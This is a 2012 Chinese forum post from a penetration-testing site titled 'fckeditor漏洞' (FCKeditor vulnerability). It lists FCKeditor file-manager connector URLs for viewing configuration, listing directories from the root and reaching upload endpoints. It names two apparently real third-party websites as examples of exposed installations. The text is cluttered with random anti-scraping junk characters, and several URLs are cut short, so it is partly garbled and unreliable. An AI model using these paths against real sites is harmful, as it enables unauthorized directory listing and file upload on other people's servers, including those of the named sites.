中国网络渗透测试联盟

标题: fckeditor漏洞 [打印本页]
作者: admin    时间: 2012-9-13 17:02
标题: fckeditor漏洞
  O3 z% S7 y6 F' }3 U1 a; `
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp  y6 R" d/ ~# R: U" ]
http://www.china-photo-model.com ... aspx/connector.aspx
) A) T# G: A$ m( A9 k. ]; m3 t. O& k& w% u, J& ?
% d' y/ n0 ?3 I) _
http://yeni.kadikoy.bel.tr/globa ... ctors/jsp/connector
) p: J+ R+ ?$ F9 ^: l& N+ z- p- X4 `, ^# z+ B" H$ m$ D
1 v$ W% r$ h1 N9 h# P4 ^
, G1 {5 T  F2 M$ I( ^, S
( f  B$ c! s) y9 O, h7 Z

5 \0 t/ r" c5 r& e查看配置和列出目录下的文件.* L0 V! g+ {! T6 [# z! n

. N- Q" h8 l! I7 G. T" W
* [8 N$ L+ S8 Z/ [" Khttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F4 l4 ]  D; v+ M; a/ q3 M/ \
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
0 d0 i6 r1 H0 i8 {$ m" F
. J4 {9 ^. X1 l! g0 X上传地址:; w0 h4 W+ p2 Y2 k# j  d

2 ^! j& W4 F. O! D  X( ~+ Jhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
$ R/ H0 y0 s) G0 q7 V' ]http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector    ../为根目录



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2